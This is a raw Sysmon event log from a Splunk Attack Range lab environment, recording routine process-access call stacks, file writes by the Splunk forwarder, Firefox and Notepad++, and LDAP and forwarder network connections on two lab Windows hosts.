07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001050086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.628{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21D99C6BC94E8F333ADFB05DC58AEE40,SHA256=CD0FEAC43C246443B05DD9EF138866F0A634434E0EA44B6E3119754579307D20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808061Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:16.253{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1B62ED2A4EAFCF50A30DA851FBCFB7A,SHA256=C489E32B8554D846CCA685AACE91B65938A4B7BE25D3B8CDADAF353757534CC7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:07.961{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51070-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001050084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:07.961{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51070-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001050103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:17.937{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=831176F4BF7F3DD2266B04BEC483495E,SHA256=3D6429409C9B9C3ADA5EA4E726EA222D45E1904BF4F798745D2C5049B86362A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:17.636{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85B61B01BC7D40FDDF7531E3B5C6AE72,SHA256=3225887FA7B678D5E982A57781F1651AD3AC59B8AA4E553BBAD87208BB43C011,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808062Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:17.268{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CCFBDC6B68D9D2DFE91945764B2300E,SHA256=A6FB43C6B6A6E29A1CDA3D143BDFEF34302B9EDEF8B2F71A310D3D32F95667D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:18.670{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5110FBA90919F4E919F03261469592A,SHA256=03849FAB8D40862AB3B3E21755D0E5133E960735B7360A2AA6659B106DB2B292,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808064Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:17.198{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57303-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808063Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:18.300{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69E14C619A8C7CA3DF9BD2E34F9E36DA,SHA256=6A58DB4CC69E7C46A671037CC746A5644C2F0102CAEC9198BAE57EC6550BC1EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:18.353{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:19.686{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C17EFCAF81C1C9D10315552E9FF974E3,SHA256=3F8EDFC05BFA6500D321FDBACC4074429F789D229CEA64488E750D4FC72FDAEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808065Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:19.378{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC6CB411235BA1E152EE406774C398BB,SHA256=77DFBA248E8C21B1F8732975ECEF336D8DAA5B0B1C2B3D3EDD94137888D638B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:10.718{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51071-false10.0.1.12-8000- 23542300x80000000000000001050108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:20.716{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49879AB4CA8664870917398B8C96D782,SHA256=DE1351C3F1AB8678535C2FA3323DBC4E2B5E9C62995A0AFE211C4A63216EF135,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808067Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:20.565{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808066Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:20.393{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2A3A4546A565ED134408C63FC2FE1BE,SHA256=B6AA56E3EA0A3E6DE82825D6755813A569C83EFBA92800AA34FEBCDD4C2283C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:21.734{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A2DA497A9669F404DBE4650BAEC7110,SHA256=291A75E05C9C323300C524D0412A83E1BD5EB714B56E914C097DCDC138528190,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808069Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:20.698{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57304-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000808068Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:21.409{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8E29255458957F0B81AA1D90FADAB26,SHA256=835FC1E1313DAA228AA5FB5859D0F400BC1640A6A6A59A8175BA2FAAE9CCDE48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:22.752{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25884AA706AD2E2856C078BBF9F4EBD0,SHA256=2B204A156FB41CA305124896EA113CE6DBA16A182D3E73529BDD31654DBDBD3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808070Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:22.440{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8E777A1320D8CEF798CDB9305DEB76C,SHA256=6D2BA678B5B032316EC4A14467F27B4592711EC72699FB6F04BBE6942B8256A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:23.782{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB2FF7CE6F97E8E86E5F254591EF2131,SHA256=0D7ED5D9ED03755A5118C7DE952D9E75BF4CA8E63ECC50ED317FB9D28DADFA58,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808072Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:22.276{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57305-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808071Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:23.503{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37A3C6AF6E21C89E96354CFEF6D23F18,SHA256=66F5F923E971A0A23AE653BA97B88A909BDAF6941A7B95802BF9DCF43754B008,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 